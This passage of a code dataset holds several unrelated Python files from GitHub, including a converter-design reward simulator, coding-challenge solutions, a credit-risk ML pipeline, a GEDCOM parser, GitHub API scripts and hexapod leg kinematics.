self.reward\n\n @abstractmethod\n def get_surrogate_eff(self, state):\n \"\"\"\n return the eff prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n @abstractmethod\n def get_surrogate_vout(self, state):\n \"\"\"\n return the vout prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n def get_surrogate_reward(self, state):\n \"\"\"\n return the vout prediction of state, and of self.get_state() if None\n \"\"\"\n pass\n\n def get_true_performance(self, state=None):\n if not self.configs_['sweep']:\n return self.get_no_sweep_true_performance(state)\n else:\n return self.get_sweep_true_performance_with_para(state)\n\n def get_no_sweep_true_performance(self, state=None):\n reward, eff, vout = self.get_true_performance_of_sim(state)\n return reward, eff, vout\n\n def get_sweep_true_performance_with_para(self, state=None):\n tmp_para = -1\n tmp_max_reward = -1\n tmp_max_eff = -1\n tmp_max_vout = -500\n for duty_cycle in self.candidate_duty_cycles:\n state.parameters = duty_cycle\n reward, eff, vout = self.get_true_performance_of_sim(state)\n if tmp_max_reward < reward:\n tmp_max_reward = reward\n tmp_para = duty_cycle\n tmp_max_eff = eff\n tmp_max_vout = vout\n self.current.parameters = tmp_para\n return tmp_max_reward, tmp_max_eff, tmp_max_vout\n\n def get_true_performance_of_sim(self, state):\n # call the file\n # TODO forget to deal with the sweep!\n \"\"\"\n :return: [reward, eff, vout]\n \"\"\"\n if state is not None:\n self.set_state(None, None, state)\n else:\n return [0, -1, -500]\n\n if not self.current.graph_is_valid():\n return [0, -1, -500]\n\n\n hash = self.get_topo_key()\n\n # if not in hash table, call ngspice\n if hash + '$' + str(state.parameters) not in self.graph_2_reward.keys():\n if hash + '$' + str(state.parameters) in self.key_sim_effi_:\n eff = self.key_sim_effi_[hash + '$' + str(state.parameters)][0]\n vout = self.key_sim_effi_[hash + '$' + str(state.parameters)][1]\n effi = {'efficiency': eff, 'output_voltage': vout}\n reward = calculate_reward(effi, self.configs_['target_vout'], self.configs_['min_vout'],\n self.configs_['max_vout'])\n else:\n if self.configs_['skip_sim']:\n reward = 0\n eff = 0\n vout = 500\n else:\n reward, eff, vout, para = super().get_single_topo_sim_result(state)\n\n self.graph_2_reward[hash + '$' + str(state.parameters)] = [reward, eff, vout]\n return reward, eff, vout\n\n else:\n if config.task == 'uct_3_comp' or config.task == 'rs_3_comp':\n return self.graph_2_reward[hash + '$' + str(state.parameters)]\n elif config.task == 'uct_5_comp':\n para, eff, vout = self.graph_2_reward[hash + '$' + str(state.parameters)]\n\n eff_obj = {'efficiency': eff,\n 'output_voltage': vout}\n reward = calculate_reward(eff_obj, self.configs_['target_vout'], self.configs_['min_vout'],\n self.configs_['max_vout'])\n\n return reward, eff, vout\n\n def get_true_reward(self, state=None):\n return self.get_true_performance(state)[0]\n","repo_name":"fanshaoze/UCT-for-Converter-Design","sub_path":"UCTUsingGNN/topo_envs/surrogateRewardSim.py","file_name":"surrogateRewardSim.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"28528930946","text":"import re\nimport numpy as np\n\n\ndef parse_file(fn):\n stack = []\n\n with open(fn, \"r\") as f:\n for line in f.readlines():\n if \"[\" in line:\n stack.append([line[i+1] for i in range(0, len(line)-1, 4)])\n\n with open(fn, \"r\") as f:\n search = r\"move (\\d*) from (\\d*) to (\\d*)\"\n instructions = re.findall(search, f.read())\n instructions = [[int(el) for el in inst] for inst in instructions]\n\n return stack, instructions\n\n\nif __name__ == \"__main__\":\n part = \"b\"\n stack, instructions = parse_file(\"day5_input1.txt\")\n\n stack = np.array(stack)\n\n empty_line = np.array([[' '] * stack.shape[1]])\n\n for number, st_from, st_to in instructions:\n temp = []\n for _ in range(number):\n index, el = next(((i, el) for (i, el) in enumerate(stack[:, st_from-1]) if el != ' '))\n temp.append(el)\n stack[index, st_from-1] = ' '\n\n for el in (reversed(temp) if part == \"b\" else temp):\n index = next((i for i, el in enumerate(stack[:, st_to-1]) if el != ' '), None)\n if index == 0:\n stack = np.concatenate((empty_line, stack), axis=0)\n index = 1\n elif index is None:\n index = stack.shape[0]\n stack[index-1, st_to-1] = el\n\n print(stack)\n","repo_name":"roijalbaker/aoc_2022","sub_path":"day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"14979514045","text":"\"\"\"\n Grid Challenge Problem on HackerRank\n Problem Link: https://www.hackerrank.com/challenges/grid-challenge/problem\n\n Author: Shyam Kumar (@svshyam91)\n\n\"\"\"\n\ndef gridChallenge(grid):\n sorted_grid=[]\n l=len(grid[0])\n for strg in grid:\n\n # Sort the string and append it to the list\n sorted_strg=\"\".join(sorted(strg))\n sorted_grid.append(sorted_strg)\n \n for i in range(l):\n st=\"\"\n for strg in sorted_grid:\n st+=strg[i] # Make string from 1st character of every string in grid\n if st != \"\".join(sorted(st)): # Check if the string is sorted\n return \"NO\"\n \n return \"YES\"\n\nif __name__ == '__main__':\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n grid = []\n\n for _ in range(n):\n grid_item = input()\n grid.append(grid_item)\n\n result = gridChallenge(grid)\n print(result)\n","repo_name":"svshyam91/hacker_rank_solutions","sub_path":"grid_challenge.py","file_name":"grid_challenge.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13906265870","text":"from read_explore_data import read, preview, make_hist\nfrom preprocess import mean_impute, impute_to_value, cat_from_cont, med_impute, log_feature\nfrom models import logistic_reg, splitX_y, create_samples, model_loop, gridsearch_model\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\n\ndef go():\n #################### Read and explore ####################\n\n df = read('./data/cs-training.csv')\n\n #make_hist(df)\n\n #################### Split, Preprocess, and Impute ####################\n\n dftrain, dftest = create_samples(df, 0.2)\n med = med_impute(dftrain, ['MonthlyIncome'])\n\n #Impute missing monthly income data from the test set to the median of the\n #training set and create log_income. 1 added to values to avoid log(0) errors.\n impute_to_value(dftest, 'MonthlyIncome', med)\n log_feature(dftrain, 'MonthlyIncome', offset_zero = 1)\n log_feature(dftest, 'MonthlyIncome', offset_zero = 1)\n #Impute missing numbers of dependents to zero.\n impute_to_value(dftrain, 'NumberOfDependents', 0)\n impute_to_value(dftest, 'NumberOfDependents', 0)\n\n #Bins and labels for debt ratio\n DebtRatioBins = [0, .2, .4, .6, .8, 1, 10, float(\"inf\")]\n DebtRatioLabels = ['<.2', '.2-.4', '.4-.6', '.6-.8', '.8-1', '1-10', '10+']\n #Bins and labels for age\n AgeBins = [0, 20, 30, 40, 50, 60, 70, 80, 150]\n AgeLabels = ['<20', '20-30', '30-40', '40-50', '50-60', '60-70', '70-80', '80+']\n\n #Create dummy variables for categories of debt ratio and age in training and testing set_value\n dftrain1 = cat_from_cont(dftrain, 'DebtRatio', DebtRatioBins, DebtRatioLabels)\n dftrain1 = cat_from_cont(dftrain1, 'age', AgeBins, AgeLabels)\n dftest1 = cat_from_cont(dftest, 'DebtRatio', DebtRatioBins, DebtRatioLabels)\n dftest1 = cat_from_cont(dftest1, 'age', AgeBins, AgeLabels)\n\n #Split training and test sets into x and y\n X_train, y_train = splitX_y(dftrain1, 'SeriousDlqin2yrs')\n X_test, y_test = splitX_y(dftest1, 'SeriousDlqin2yrs')\n\n\n #################### Generate and evaluate models #####################\n\n gridsearch_model(X_train, X_test, y_train, y_test, ['DT'], 'modelComparisonDT.png')#KNN', 'DT', 'SGD', 'LR', 'NB', 'AB', 'RF', 'GB'])\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"lmcindewar/CAPP30254-lmcindewar","sub_path":"Assignment3/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5790802108","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nsns.set_style(\"ticks\")\nsns.set_style({\"xtick.direction\": \"in\", \"ytick.direction\": \"in\"})\nmatplotlib.rcParams.update({\"font.size\": 14})\nmatplotlib.rcParams.update({\"axes.labelsize\": 16})\nmatplotlib.rcParams.update({\"legend.fontsize\": 16})\nmatplotlib.rcParams.update({\"xtick.labelsize\": 16, \"ytick.labelsize\": 16})\n# pd.options.display.float_format = '{:,.6f}'.format\n# cmap = plt.get_cmap(\"Dark2\")\n# cmap = plt.get_cmap('tab10')\n\nstrain_name_df = pd.read_excel(\"./data/strain_num_matching.xlsx\", index_col=0)\nnum_days = 27\nstart_day = 1\n# remove the first day from the trajectory data\nt = np.linspace(start_day, num_days, num_days - start_day + 1)\n\nstress_list = [\"TET\", \"KM\", \"NFLX\", \"SS\", \"PLM\", \"NQO\", \"SDC\", \"MMC\"]\nevo192_res = pd.read_excel(\"./data/192evo_ic50.xlsx\", index_col=0, skiprows=1)\nparent_ic50 = pd.read_excel(\"./data/192evo_parent_ic50.xlsx\", index_col=1, skiprows=1)[\n \"Parent mean IC50 [log2(μg/mL)]\"\n]\n\n# choose the strains to plot by defining start_strain & num_strains\nstart_strain = 1\nnum_strains = 4\n\n\ndef plot_time_series(\n strain,\n stress,\n color,\n start_day=start_day,\n zorder=1,\n alpha=0.15,\n marker=\".\",\n i=None,\n print_title=True,\n label=None,\n):\n \"\"\"\n plot resistance for 'strain'\n strain: corresponds to strain_num for each trajectory file.\n stress: which stress resistance you want to plot.\n start_day: day to start the trajectory\n color, zorder, alpha, marker: args for plt.plot()\n i:\n \"\"\"\n\n title = strain_name_df.iloc[strain - 1][0]\n df = pd.read_csv(\"./data/trajectories/strain\" + str(strain) + \".csv\", index_col=0)\n trajectory = df.loc[stress]\n if strain == 26:\n # because strain26 died at day 15\n traj_len = trajectory.shape[0]\n plt.plot(\n np.linspace(start_day, traj_len, traj_len - start_day + 1),\n trajectory.iloc[start_day - 1 :],\n color=color,\n alpha=alpha,\n zorder=zorder,\n marker=marker,\n label=label,\n )\n else:\n plt.plot(\n t,\n trajectory.iloc[start_day - 1 :],\n color=color,\n alpha=alpha,\n zorder=zorder,\n marker=marker,\n label=label,\n )\n if i == 0 and print_title:\n plt.title(title, fontsize=15)\n\n\ndef plot_strain(\n strain_num_start,\n strain_num_end,\n stress1,\n stress2,\n strain_label,\n roll_win=None,\n cmap_name=None,\n cmap_level=6,\n):\n for strain in range(strain_num_start, strain_num_end + 1):\n # parent strains in TET\n if cmap_name is not None:\n # cmap2 = plt.get_cmap(cmap_name, cmap_level)\n cmap2 = sns.color_palette(cmap_name, cmap_level)\n df = pd.read_csv(\n \"./data/trajectories/strain\" + str(strain) + \".csv\", index_col=0\n )\n trajectory1 = df.loc[stress1]\n trajectory2 = df.loc[stress2]\n if roll_win is not None:\n trajectory1 = trajectory1.T.rolling(\n roll_win, min_periods=1, win_type=\"triang\"\n ).mean()\n trajectory2 = trajectory2.T.rolling(\n roll_win, min_periods=1, win_type=\"triang\"\n ).mean()\n if strain == strain_num_end:\n plt.plot(\n trajectory1.values,\n trajectory2.values,\n \".-\",\n lw=0.9,\n markersize=4.8,\n color=cmap2[strain - strain_num_start + 2],\n label=strain_label,\n zorder=3,\n )\n else:\n plt.plot(\n trajectory1.values,\n trajectory2.values,\n \".-\",\n lw=0.9,\n markersize=4.8,\n color=cmap2[strain - strain_num_start + 2],\n zorder=3,\n )\n plt.scatter(trajectory1[0], trajectory2[0], color=\"k\", alpha=1, zorder=1, s=32)\n plt.scatter(trajectory1[-1], trajectory2[-1], color=\"gray\", alpha=1, zorder=1, s=25)\n plt.xlabel(stress1 + \" resistance\")\n plt.ylabel(stress2 + \" resistance\")\n","repo_name":"jiwasawa/resistance-landscape","sub_path":"src/time_series_generation.py","file_name":"time_series_generation.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36947756701","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nbusi_revi = pd.read_csv(\"busi_revi.csv\")\n\n\ndef join_(lst):\n return \" \".join(lst)\n\n\nbusi_revi['text'] = busi_revi['text'].apply(eval).apply(join_)\n\n\ndef tfidf(corpus):\n vectorizer = CountVectorizer(min_df=20)\n transformer = TfidfTransformer()\n tfidf = transformer.fit_transform(vectorizer.fit_transform(corpus))\n word = vectorizer.get_feature_names()\n weight = tfidf.toarray().sum(axis=0)\n\n tfidf_Ser = pd.Series(weight, index=word).sort_values(ascending=False)\n return tfidf_Ser\n","repo_name":"xiaowei-zhu/STAT628-Module3","sub_path":"code/preliminary analysis/tf-idf.py","file_name":"tf-idf.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40101095748","text":"import datetime\r\n\r\ndef individualList():\r\n output_list = [0 for i in range(7)]\r\n output_list[5] = []\r\n return output_list\r\ndef getLastName(str):\r\n lastName=''\r\n for i in str:\r\n if(i != '/'):\r\n lastName += i\r\n return lastName\r\n\r\ndef familyList():\r\n output_list = [0 for i in range(6)]\r\n output_list[5] = []\r\n return output_list\r\n\r\ndef getNameByID(list_individual, id):\r\n for i in list_individual:\r\n if(i[0] == id):\r\n return i[1]\r\n \r\ndef getDeathDateByID(list_individual, id):\r\n for i in list_individual:\r\n if(i[0] == id):\r\n if(i[4] != 0):\r\n return i[4]\r\n \r\ndef dateFormatConversion(date):\r\n m = date.split()\r\n if(m[1] == 'JAN'): m[1] = '01';\r\n if(m[1] == 'FEB'): m[1] = '02';\r\n if(m[1] == 'MAR'): m[1] = '03';\r\n if(m[1] == 'APR'): m[1] = '04';\r\n if(m[1] == 'MAY'): m[1] = '05';\r\n if(m[1] == 'JUN'): m[1] = '06';\r\n if(m[1] == 'JUL'): m[1] = '07';\r\n if(m[1] == 'AUG'): m[1] = '08';\r\n if(m[1] == 'SEP'): m[1] = '09';\r\n if(m[1] == 'OCT'): m[1] = '10';\r\n if(m[1] == 'NOV'): m[1] = '11';\r\n if(m[1] == 'DEC'): m[1] = '12';\r\n if(m[2] in ['1', '2', '3', '4', '5', '6', '7', '8', '9']):\r\n m[2] = '0' + m[2]\r\n return (m[0] + '-' + m[1] + '-' + m[2])\r\n \r\ndef deceasedList(list_individual):\r\n deceasedList = []\r\n for individual in list_individual:\r\n if individual[4] is not 0:\r\n deceasedList.append(individual[0])\r\n print(\"User Story 29: Deceased individuals list is as follows : \", deceasedList)\r\n for i in deceasedList:\r\n print(\"Individual with ID \" + i + \" and name \" + getNameByID(list_individual, i) + \" passed away on \" + getDeathDateByID(list_individual, i))\r\n \r\ndef toParse(gedFileName):\r\n f = open(gedFileName,'r')\r\n list_individual = []\r\n list_family = []\r\n indi_on = 0\r\n fam_on = 0\r\n individual = individualList()\r\n family = familyList()\r\n for line in f:\r\n str = line.split()\r\n if(str != []):\r\n if(str[0] == '0'):\r\n if(fam_on == 1):\r\n list_family.append(family)\r\n family = familyList()\r\n fam_on = 0\r\n if(indi_on == 1):\r\n list_individual.append(individual)\r\n individual = individualList()\r\n indi_on = 0 \r\n if(str[1] in ['NOTE', 'HEAD', 'TRLR']):\r\n pass\r\n else:\r\n if(str[2] == 'INDI'):\r\n indi_on = 1\r\n individual[0] = (str[1])\r\n if(str[2] == 'FAM'):\r\n fam_on = 1\r\n family[0] = (str[1])\r\n if(str[0] == '1'):\r\n if(str[1] == 'NAME'):\r\n individual[1] = str[2] + \" \" + getLastName(str[3])\r\n if(str[1] == 'SEX'):\r\n individual[2] = str[2]\r\n if(str[1] == 'FAMS'):\r\n individual[5].append(str[2])\r\n if(str[1] == 'FAMC'):\r\n individual[6] = str[2]\r\n if(str[1] == 'HUSB'):\r\n family[1] = str[2]\r\n if(str[1] == 'WIFE'):\r\n family[2] = str[2]\r\n if(str[1] == 'CHIL'):\r\n family[5].append(str[2])\r\n if(str[1] in ['BIRT', 'DEAT', 'MARR', 'DIV']):\r\n date_id = str[1] \r\n if(str[0] == '2'):\r\n if(str[1] == 'DATE'):\r\n date = str[4] + \" \" + str[3] + \" \" + str[2]\r\n if(date_id == 'MARR'):\r\n family[3] = dateFormatConversion(date)\r\n if(date_id == 'DIV'):\r\n family[4] = dateFormatConversion(date)\r\n if(date_id == 'BIRT'):\r\n individual[3] = dateFormatConversion(date)\r\n if(date_id == 'DEAT'):\r\n individual[4] = dateFormatConversion(date)\r\n \r\n return list_individual,list_family\r\n\r\ndef main(gedFileName):\r\n list_individual, list_family= toParse(gedFileName)\r\n list_individual.sort()\r\n list_family.sort()\r\n deceasedList(list_individual)\r\n\r\nmain('D:/SSW-555/Week 5/Akanksha_Homework 4/Homework 4/akankshaGedcom.ged')\r\n","repo_name":"salonikalsekar/CS555-SSW555_agileMethodologies","sub_path":"userStory29.py","file_name":"userStory29.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11538595167","text":"#!/usr/bin/env python3\n\"\"\"Sends a GET request with authentication token to the GitHub to pull a specific repo.\n Prints response status code, verifies some repo fields.\"\"\"\nfrom pprint import pprint\n\nimport requests\n\nfrom my_utils import get_data_from_file, get_github_api_headers, validate_records\n\n\ndef get_created_repo(url_, validation_data):\n \"\"\"Sends a GET request with private auth token to `url_`, prints response code.\n Verifies certain values of the fields from `data` dict.\"\"\"\n token = get_data_from_file(\"secrets/github_token\")\n\n response = requests.get(\n url_,\n headers=get_github_api_headers(token),\n timeout=(2, 5)\n )\n\n status_code = response.status_code\n print(f\"Response status code: {status_code}\")\n\n if response:\n repository_data = response.json()\n mismatches = validate_records(validation_data, repository_data)\n if mismatches:\n pprint(mismatches)\n raise AssertionError\n else:\n print(\"An error has occurred!\")\n\n\nif __name__ == \"__main__\":\n v_data = {\"owner\": {\"login\": \"ehnat0n\", \"id\": 539144290}, \"name\": \"repo-created-with-api\",\n \"id\": 7249605570, \"has_wiki\": False, \"private\": True}\n\n OWNER = v_data[\"owner\"][\"login\"]\n REPO = v_data[\"name\"]\n\n url = f\"https://api.github.com/repos/{OWNER}/{REPO}\"\n\n get_created_repo(url, v_data)\n","repo_name":"ehnat0n/webdrivercamp-learning-api","sub_path":"requests/3_get_created_repo.py","file_name":"3_get_created_repo.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35653038184","text":"import os\nimport requests\nfrom flask import Blueprint, jsonify\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nmy_secret = os.getenv('MY_SECRET')\n\ntop_contributors = Blueprint('top_contributors', __name__)\n\n@top_contributors.route('/api/contributors', methods=['GET'])\ndef get_top_contributors():\n headers = {'Authorization': f'token {os.getenv(\"MY_SECRET\")}'}\n response = requests.get('https://api.github.com/search/repositories?q=stars:%3E1&sort=stars&order=desc', headers=headers)\n repos = response.json()['items']\n\n # A list to store top contributors\n contributors = []\n \n for repo in repos:\n owner = repo['owner']['login']\n repo_name = repo['name']\n response = requests.get(f'https://api.github.com/repos/{owner}/{repo_name}/contributors', headers=headers)\n print(response.json())\n print(response.headers['X-RateLimit-Remaining'])\n repo_contributors = response.json()\n if isinstance(repo_contributors, list) and len(repo_contributors) > 0:\n contributors.append(repo_contributors[0])\n \n return jsonify(contributors)\n","repo_name":"glendonC/ossPulse","sub_path":"osspulse/backend/api/top_contributors.py","file_name":"top_contributors.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25550842782","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#Aufgabe 1\n\n#a\n\nA = np.array([[1,2,1],[-1,2,-3],[0,1,-2]])\n\ndef frobenius_norm(A):\n return np.sqrt(np.sum(A*A))\n\nprint(\"a.)\",frobenius_norm(A))\n\n#b \ndef info(A):\n return (np.min(A),np.mean(A),np.max(A))\n\nprint(\"b.)\",info(A))\n\n#c\ndef maximum_norm(A):\n return np.max(np.sum(np.abs(A), axis=1))\n\nprint(\"c.)\",maximum_norm(A))\n\n#d\ndef upper3(d,u1,u2,N):\n if N>=2:\n return d*np.eye(N)+u1*np.eye(N,N,1)+u2*np.eye(N,N,2)\n else:\n print(\"Die Dimension muss mindestens 2 sein\")\n \nprint(\"d.)\",upper3(1,2,3,7))\n\n#e\ndef insert(B, start_row, start_col, A):\n M, N = B.shape\n I, J = A.shape\n\n #Überprüfung ob die Matrix B die richtige Dimension hat\n if not(M <= I - start_row and N <= J - start_col):\n print(\"Die Dimension von B ist nicht gültig\")\n\n A[start_row:start_row+M, start_col:start_col+N] = B\n return A\n\nB = np.array([[1, 0],\n [0, 3],\n [0, 1]])\n\nA = np.ones((5,5))\nstart_row = 1\nstart_col = 3\n\nresult = insert(B, start_row, start_col, A)\nprint(\"e.)\",result)","repo_name":"tobibrosch/mathematischeprogrammierung","sub_path":"Gruppenphase/Blatt06/nowakbrosch_Blatt06_1.py","file_name":"nowakbrosch_Blatt06_1.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35938955658","text":"\"\"\" #Crie uma lista com 10 números quaisquer:\n\n\nlist_number = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n# a. uma lista com os 4 primeiros números\n\nfirst_four = list_number[:4]\n\n# b. uma lista com os 5 últimos números\nlast_five = list_number[5:]\n\n# c. uma lista contendo apenas os elementos das posições pares\neven_positions = list_number[1::2]\n\n# d. uma lista contendo apenas os elementos das posições ímpares\nodd_positions = list_number[0::2]\n\n# e. a lista inversa da lista sorteada (isto é, uma lista que começa com o último elemento da lista sorteada e termina com o primeiro)\nreversed_list = list_number[::-1]\n\n# f. uma lista inversa dos 5 primeiros números\nreversed_first_five = list_number[4::-1]\n\n# g. uma lista inversa dos 5 últimos números.\nreversed_last_five= list_number[:5][::-1]\n\n\"\"\"\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n# a. Uma lista com os primeiros 4 números\nfirst_four = []\nfor i in range(4):\n first_four.append(numbers[i])\n\n# b. Uma lista com os últimos 5 números\nlast_five = []\nfor i in range(len(numbers) - 5, len(numbers)):\n last_five.append(numbers[i])\n\n# c. Uma lista contendo apenas os elementos em posições pares\neven_positions = []\nfor i in range(1, len(numbers), 2):\n even_positions.append(numbers[i])\n\n# d. Uma lista contendo apenas os elementos em posições ímpares\nodd_positions = []\nfor i in range(0, len(numbers), 2):\n odd_positions.append(numbers[i])\n\n# e. A lista reversa da lista original\nreversed_list = []\nfor i in range(len(numbers) - 1, -1, -1):\n reversed_list.append(numbers[i])\n\n# f.Uma lista reversa dos primeiros 5 números\nreversed_first_five = []\nfor i in range(4, -1, -1):\n reversed_first_five.append(numbers[i])\n\n# g. Uma lista reversa dos últimos 5 números\nreversed_last_five = []\nfor i in range(len(numbers) - 1, len(numbers) - 6, -1):\n reversed_last_five.append(numbers[i])\n\nprint(\"a. First four numbers:\", first_four)\nprint(\"b. Last five numbers:\", last_five)\nprint(\"c. Elements at even positions:\", even_positions)\nprint(\"d. Elements at odd positions:\", odd_positions)\nprint(\"e. Reversed list:\", reversed_list)\nprint(\"f. Reversed first five numbers:\", reversed_first_five)\nprint(\"g. Reversed last five numbers:\", reversed_last_five)\n\n\n\n\n\n\n\n","repo_name":"claraferreirabatista/Ada","sub_path":"CodingTank/atividade4/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73652420349","text":"# 给你一个下标从 0 开始的正整数数组 nums 。请你找出并统计满足下述条件的三元组 (i, j, k) 的数目:\n\n# 0 <= i < j < k < nums.length\n# nums[i]、nums[j] 和 nums[k] 两两不同 。\n# 换句话说:nums[i] != nums[j]、nums[i] != nums[k] 且 nums[j] != nums[k] 。\n# 返回满足上述条件三元组的数目。\n\n\n\nclass Solution(object):\n def unequalTriplets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n for k in range(j + 1, n):\n if nums[i] != nums[j] and nums[j] != nums[k] and nums[i] != nums[k]:\n ans += 1\n\n return ans\n\n\nnums = [4,4,2,4,3]\n\na = Solution()\nprint(a.unequalTriplets(nums))","repo_name":"xxxxlc/leetcode","sub_path":"competition/单周赛/320/unequalTriplets.py","file_name":"unequalTriplets.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41054504495","text":"import numpy as np\nfrom DRIVE.jointdrive_edit import *\n\nclass Leg:\n\n # a -> Laengenmaße (in m)\n # b -> Offset [x_B, y_B] (in m)\n # r -> Rotationswinkel (in rad)\n # m -> Motorobjekte\n # n -> Nullwinkel der Motoren\n def __init__(self, a=[1, 1, 1, 1, 1, 1, 1], b=[0, 0], r=0, m=[0, 0, 0], n=[0, 0, 0]):\n self.a = [a[0], a[1], a[2], a[3], a[4], a[5], a[6]]\n self.offset = [b[0], b[1]]\n self.rotation = r\n\n self.lc = self.a[2]\n self.lcSquare = math.pow(self.lc, 2)\n self.lf = math.sqrt(math.pow(self.a[3], 2) + math.pow(self.a[4], 2))\n self.lfSquare = math.pow(self.lf, 2)\n self.lt = math.sqrt(math.pow(self.a[5], 2) + math.pow(self.a[6], 2))\n self.ltSquare = math.pow(self.lt, 2)\n self.servoOffset = [math.cos(self.rotation) * self.a[0], math.sin(self.rotation) * self.a[0], -self.a[1], 0]\n\n # für Geschwindigkeitsberechnung\n self.lastPosition = [0, 0, 0]\n\n self.turnOffset = [n[0], n[1], n[2]]\n servoA = JointDrive(m[0], aOffset=self.turnOffset[0], ccw=False, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n servoB = JointDrive(m[1], aOffset=self.turnOffset[1], ccw=True, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n servoC = JointDrive(m[2], aOffset=self.turnOffset[2], ccw=False, prt=True, aMax=math.radians(120), aMin=math.radians(-120))\n self.motors = [servoA, servoB, servoC]\n\n self.motorAngles = [self.motors[0].getCurrentJointAngle(), self.motors[1].getCurrentJointAngle(), self.motors[2].getCurrentJointAngle()]\n\n # Vorgegebene Methoden\n def forKinAlphaJoint(self, alpha, beta, gamma):\n pos = [0, 0, 0, 1]\n pos[0] = math.cos(alpha) * (self.lt * math.cos(beta + gamma) + self.lf * math.cos(beta) + self.lc)\n pos[1] = math.sin(alpha) * (self.lt * math.cos(beta + gamma) + self.lf * math.cos(beta) + self.lc)\n pos[2] = self.lt * math.sin(beta + gamma) + self.lf * math.sin(beta)\n return pos\n\n def invKinAlphaJoint(self, pos=[0, 0, 0, 1]):\n alpha = math.atan2(pos[1], pos[0])\n footPos = np.array(pos)\n A1 = np.array([\n [math.cos(alpha), 0, math.sin(alpha), self.lc * math.cos(alpha)],\n [math.sin(alpha), 0, -math.cos(alpha), self.lc * math.sin(alpha)],\n [0, 1, 0, 0],\n [0, 0, 0, 1]])\n betaPos = np.dot(A1, np.transpose([0, 0, 0, 1]))\n lct = np.linalg.norm(footPos[0:3] - betaPos[0:3])\n lctSquare = math.pow(lct, 2)\n gamma = math.acos((self.ltSquare + self.lfSquare - lctSquare) / (2 * self.lt * self.lf)) - math.pi\n h1 = math.acos((self.lfSquare + lctSquare - self.ltSquare) / (2 * self.lf * lct))\n h2 = math.acos((lctSquare + self.lcSquare - math.pow(np.linalg.norm(footPos[0:3]), 2)) / (2 * self.lc * lct))\n if footPos[2] < 0:\n beta = (h1 + h2) - math.pi\n else:\n beta = (math.pi - h2) + h1\n return (alpha, beta, gamma)\n\n # Hilfsmethoden\n def baseCStoLegCS(self, pos=[0, 0, 0, 1]):\n noServoOffset = np.subtract(pos, self.servoOffset)\n H = np.array([\n [math.cos(-self.rotation), -math.sin(-self.rotation), 0, -self.offset[0]],\n [math.sin(-self.rotation), math.cos(-self.rotation), 0, -self.offset[1]],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n pos = np.dot(H, noServoOffset)\n return pos\n\n #Methoden für die COM-ROS Gruppe\n def getPosition(self):\n H = np.array([\n [math.cos(self.rotation), -math.sin(self.rotation), 0, self.offset[0]],\n [math.sin(self.rotation), math.cos(self.rotation), 0, self.offset[1]],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n Hp = np.dot(H, self.forKinAlphaJoint(self.motors[0].getCurrentJointAngle(), self.motors[1].getCurrentJointAngle(), self.motors[2].getCurrentJointAngle()))\n posnp = np.add(Hp, self.servoOffset)\n pos = [posnp[0], posnp[1], posnp[2], 1]\n return pos\n\n def setPosition(self, pos=[0, 0, 0, 1]):\n goalAngle = self.invKinAlphaJoint(self.baseCStoLegCS(pos))\n self.motors[0].setDesiredJointAngle([goalAngle[0]])\n self.motors[1].setDesiredJointAngle([goalAngle[1]])\n self.motors[2].setDesiredJointAngle([goalAngle[2]])\n return goalAngle\n\n @staticmethod\n def convert(pos, add=False):\n if add:\n return [pos[0], pos[1], pos[2], 1]\n else:\n return pos[:-1]\n\n #Zu Testzwecken im Plotter\n def testCreateAi(self, a, alpha, d, theta):\n return np.array([\n [math.cos(theta), -math.sin(theta)*math.cos(alpha), math.sin(theta)*math.sin(alpha), a*math.cos(theta)],\n [math.sin(theta), math.cos(theta)*math.cos(alpha), -math.cos(theta)*math.sin(alpha), a*math.sin(theta)],\n [0, math.sin(alpha), 